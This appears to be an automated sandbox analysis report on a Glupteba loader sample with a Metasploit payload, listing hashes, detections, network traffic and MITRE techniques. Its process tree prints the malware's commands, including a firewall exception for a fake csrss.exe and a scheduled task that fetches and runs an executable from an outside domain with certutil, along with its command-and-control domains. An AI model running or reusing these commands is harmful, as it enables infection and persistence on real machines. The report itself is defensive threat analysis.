glupteba | df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51 | Triage

Analysis

max time kernel
5s
max time network
165s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
31/12/2023, 03:26 UTC

Sharing

Report Analysis Logs

General

Target

2654d11f2d3ce974e432ad1c84bcd1f7.exe
Size

4.5MB
MD5

2654d11f2d3ce974e432ad1c84bcd1f7
SHA1

053efdc46790dd1b49e93863df59c83c39342c8f
SHA256

df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51
SHA512

8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7
SSDEEP

98304:UvcNtBvoJc7I0r0fy0hqQRi69numaD09pJ6N5f1qlFBdWiBl5E1oz2tiuD:UkJtjr0fXRi65rwfCFTZteoz2B

Score

10^/10

glupteba metasploit backdoor dropper evasion loader trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 18 IoCs

resource	yara_rule
behavioral1/memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp	family_glupteba
behavioral1/memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp	family_glupteba
behavioral1/memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp	family_glupteba
behavioral1/memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Modifies Windows Firewall 1 TTPs 1 IoCs

Windows Service

pid	Process
2636	netsh.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task/Job

pid	Process
2792	schtasks.exe
368	schtasks.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	28	Go-http-client/1.1
HTTP User-Agent header	29	Go-http-client/1.1

C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe
"C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
1⤵
PID:1164
- C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe
  "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
  2⤵
  PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:2580
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe /51-51
    3⤵
    PID:2504
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:2792
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:368
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      PID:2356

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240102022855.log C:\Windows\Logs\CBS\CbsPersist_20240102022855.cab
1⤵
PID:2404

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:2636

Network

DNS

ninhaine.com

Remote address:

8.8.8.8:53

Request

ninhaine.com

IN TXT

Response
DNS

2makestorage.com

Remote address:

8.8.8.8:53

Request

2makestorage.com

IN TXT

Response
DNS

2makestorage.com

Remote address:

8.8.8.8:53

Request

2makestorage.com

IN TXT
DNS

2makestorage.com

Remote address:

8.8.8.8:53

Request

2makestorage.com

IN TXT
DNS

nisdably.com

Remote address:

8.8.8.8:53

Request

nisdably.com

IN TXT

Response

nisdably.com

IN TXT

.v=spf1 include:_incspfcheck.mailspike.net ?all
DNS

nisdably.com

Remote address:

8.8.8.8:53

Request

nisdably.com

IN TXT
DNS

7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com

Remote address:

8.8.8.8:53

Request

7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com

IN TXT

Response
DNS

server2.ninhaine.com

Remote address:

8.8.8.8:53

Request

server2.ninhaine.com

IN A

Response

server2.ninhaine.com

IN A

46.8.8.100
DNS

server2.ninhaine.com

Remote address:

8.8.8.8:53

Request

server2.ninhaine.com

IN A
DNS

apps.identrust.com

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A

Response

apps.identrust.com

IN CNAME

identrust.edgesuite.net

identrust.edgesuite.net

IN CNAME

a1952.dscq.akamai.net

a1952.dscq.akamai.net

IN A

96.17.179.184

a1952.dscq.akamai.net

IN A

96.17.179.205
DNS

apps.identrust.com

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A
DNS

apps.identrust.com

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A

Response

apps.identrust.com

IN CNAME

identrust.edgesuite.net

identrust.edgesuite.net

IN CNAME

a1952.dscq.akamai.net

a1952.dscq.akamai.net

IN A

96.17.179.184

a1952.dscq.akamai.net

IN A

96.17.179.205
DNS

apps.identrust.com

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A
DNS

apps.identrust.com

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A
DNS

msdl.microsoft.com

Remote address:

8.8.8.8:53

Request

msdl.microsoft.com

IN A

Response

msdl.microsoft.com

IN CNAME

msdl.microsoft.akadns.net

msdl.microsoft.akadns.net

IN CNAME

msdl-microsoft-com.a-0016.a-msedge.net

msdl-microsoft-com.a-0016.a-msedge.net

IN CNAME

a-0016.a-msedge.net

a-0016.a-msedge.net

IN A

204.79.197.219
GET

http://apps.identrust.com/roots/dstrootcax3.p7c

Remote address:

96.17.179.184:80

Request

GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

Response

HTTP/1.1 200 OK

X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Tue, 02 Jan 2024 03:29:47 GMT
Date: Tue, 02 Jan 2024 02:29:47 GMT
Connection: keep-alive
GET

http://apps.identrust.com/roots/dstrootcax3.p7c

Remote address:

96.17.179.184:80

Request

GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

Response

HTTP/1.1 200 OK

X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Tue, 02 Jan 2024 03:29:49 GMT
Date: Tue, 02 Jan 2024 02:29:49 GMT
Connection: keep-alive
DNS

www.microsoft.com

Remote address:

8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dscb.akamaiedge.net

e13678.dscb.akamaiedge.net

IN A

92.123.241.137
DNS

ww82.ninhaine.com

Remote address:

8.8.8.8:53

Request

ww82.ninhaine.com

IN A

Response

ww82.ninhaine.com

IN CNAME

63214.bodis.com

63214.bodis.com

IN A

199.59.243.225
DNS

ww82.ninhaine.com

Remote address:

8.8.8.8:53

Request

ww82.ninhaine.com

IN A
DNS

ww82.ninhaine.com

Remote address:

8.8.8.8:53

Request

ww82.ninhaine.com

IN A
DNS

ww82.ninhaine.com

Remote address:

8.8.8.8:53

Request

ww82.ninhaine.com

IN A
GET

http://ww82.ninhaine.com/

Remote address:

199.59.243.225:80

Request

GET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

date: Tue, 02 Jan 2024 02:29:56 GMT
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: ec1b3501-b497-4488-97f4-079e9a224a28
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=ec1b3501-b497-4488-97f4-079e9a224a28; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
GET

http://ww82.ninhaine.com/

Remote address:

199.59.243.225:80

Request

GET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

date: Tue, 02 Jan 2024 02:29:56 GMT
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: aea5f282-ebbf-4187-8753-3328666798f3
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PWYaEjx1WLab74ULRf6Jk7/LR73s9JiUTVCBBaovLQ9NfKj4K53i5rfcUyBtNPKTbRb0vLBnSDmDHwZzWPyBTA==
set-cookie: parking_session=aea5f282-ebbf-4187-8753-3328666798f3; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
GET

http://ww82.ninhaine.com/

Remote address:

199.59.243.225:80

Request

GET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

date: Tue, 02 Jan 2024 02:29:58 GMT
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: 77140089-0927-465a-ac53-e3d498537c8d
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TeqaaDzaGkh++CO3S2rcAD+HiwCyxodbqjX0AgEelFwPnTwWZi+A6QzfdPwL/iC6OYYBvcgXGbWB/P0ZEczIcQ==
set-cookie: parking_session=77140089-0927-465a-ac53-e3d498537c8d; expires=Tue, 02 Jan 2024 02:44:58 GMT; path=/
GET

http://ww82.ninhaine.com/

Remote address:

199.59.243.225:80

Request

GET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

date: Tue, 02 Jan 2024 02:29:59 GMT
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: 8b263e78-fd1c-4205-8c2c-64046dd374fd
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ppx9vxY7pmKhVFjR3+KyMhuE2D1SlyAf7U9Eg/jAKoTo2ogcFYqti0wYsjkE25HHFUyy7CruXr2Oi10jSAWC9g==
set-cookie: parking_session=8b263e78-fd1c-4205-8c2c-64046dd374fd; expires=Tue, 02 Jan 2024 02:44:59 GMT; path=/
GET

http://ww82.ninhaine.com/

Remote address:

199.59.243.225:80

Request

GET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

date: Tue, 02 Jan 2024 02:30:01 GMT
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe; expires=Tue, 02 Jan 2024 02:45:01 GMT; path=/
DNS

vsblobprodscussu5shard30.blob.core.windows.net

Remote address:

8.8.8.8:53

Request

vsblobprodscussu5shard30.blob.core.windows.net

IN A

Response

vsblobprodscussu5shard30.blob.core.windows.net

IN CNAME

blob.sat09prdstrz08a.store.core.windows.net

blob.sat09prdstrz08a.store.core.windows.net

IN CNAME

blob.SAT09PrdStrz08A.trafficmanager.net

blob.SAT09PrdStrz08A.trafficmanager.net

IN A

20.150.79.68

blob.SAT09PrdStrz08A.trafficmanager.net

IN A

20.150.70.36

blob.SAT09PrdStrz08A.trafficmanager.net

IN A

20.150.38.228

46.8.8.100:443

server2.ninhaine.com

tls

1.1kB
5.1kB
12
13
46.8.8.100:443

server2.ninhaine.com

152 B
3
46.8.8.100:443

server2.ninhaine.com

tls

1.9kB
5.1kB
13
14
46.8.8.100:443

server2.ninhaine.com

tls

1.1kB
4.9kB
14
9
204.79.197.219:443

msdl.microsoft.com

tls

1.9kB
8.0kB
15
16
96.17.179.184:80

http://apps.identrust.com/roots/dstrootcax3.p7c

http

369 B
1.6kB
5
4

HTTP Request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

HTTP Response

200
96.17.179.184:80

http://apps.identrust.com/roots/dstrootcax3.p7c

http

727 B
1.6kB
7
4

HTTP Request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

HTTP Response

200
46.8.8.100:443

server2.ninhaine.com

tls

1.1kB
5.0kB
16
10
46.8.8.100:443

server2.ninhaine.com

tls

1.3kB
236 B
10
5
46.8.8.100:443

server2.ninhaine.com

tls

14.9kB
8.7kB
30
27
46.8.8.100:443

server2.ninhaine.com

tls

836 B
4.9kB
10
10
199.59.243.225:80

http://ww82.ninhaine.com/

http

565 B
2.5kB
9
7

HTTP Request

GET http://ww82.ninhaine.com/

HTTP Response

200
199.59.243.225:80

http://ww82.ninhaine.com/

http

1.5kB
8.9kB
16
17

HTTP Request

GET http://ww82.ninhaine.com/

HTTP Response

200

HTTP Request

GET http://ww82.ninhaine.com/

HTTP Response

200

HTTP Request

GET http://ww82.ninhaine.com/

HTTP Response

200

HTTP Request

GET http://ww82.ninhaine.com/

HTTP Response

200
46.8.8.100:443

server2.ninhaine.com

tls

4.8kB
6.2kB
31
24
20.150.79.68:443

vsblobprodscussu5shard30.blob.core.windows.net

tls

21.1kB
989.7kB
427
713

8.8.8.8:53

ninhaine.com

dns

58 B
58 B
1
1

DNS Request

ninhaine.com
8.8.8.8:53

2makestorage.com

dns

186 B
135 B
3
1

DNS Request

2makestorage.com

DNS Request

2makestorage.com

DNS Request

2makestorage.com
8.8.8.8:53

nisdably.com

dns

116 B
117 B
2
1

DNS Request

nisdably.com

DNS Request

nisdably.com
8.8.8.8:53

7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com

dns

95 B
95 B
1
1

DNS Request

7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com
8.8.8.8:53

server2.ninhaine.com

dns

132 B
82 B
2
1

DNS Request

server2.ninhaine.com

DNS Request

server2.ninhaine.com

DNS Response

46.8.8.100
8.8.8.8:53

apps.identrust.com

dns

128 B
165 B
2
1

DNS Request

apps.identrust.com

DNS Request

apps.identrust.com

DNS Response

96.17.179.184

96.17.179.205
8.8.8.8:53

apps.identrust.com

dns

192 B
165 B
3
1

DNS Request

apps.identrust.com

DNS Request

apps.identrust.com

DNS Request

apps.identrust.com

DNS Response

96.17.179.184

96.17.179.205
8.8.8.8:53

msdl.microsoft.com

dns

64 B
182 B
1
1

DNS Request

msdl.microsoft.com

DNS Response

204.79.197.219
8.8.8.8:53

www.microsoft.com

dns

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

92.123.241.137
8.8.8.8:53

ww82.ninhaine.com

dns

252 B
105 B
4
1

DNS Request

ww82.ninhaine.com

DNS Request

ww82.ninhaine.com

DNS Request

ww82.ninhaine.com

DNS Request

ww82.ninhaine.com

DNS Response

199.59.243.225
8.8.8.8:53

vsblobprodscussu5shard30.blob.core.windows.net

dns

92 B
231 B
1
1

DNS Request

vsblobprodscussu5shard30.blob.core.windows.net

DNS Response

20.150.79.68

20.150.70.36

20.150.38.228

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

Windows Service

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

Windows Service

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1164-1-0x0000000000F20000-0x000000000135C000-memory.dmp

Filesize
4.2MB

Download
memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp

Filesize
9.1MB

Download
memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/1164-0-0x0000000000F20000-0x000000000135C000-memory.dmp

Filesize
4.2MB

Download
memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/1164-6-0x0000000000F20000-0x000000000135C000-memory.dmp

Filesize
4.2MB

Download
memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp

Filesize
9.1MB

Download
memory/2356-45-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2356-61-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-20-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2504-329-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-328-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-22-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-26-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-327-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-326-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2848-5-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2848-8-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp

Filesize
9.1MB

Download
memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2848-21-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download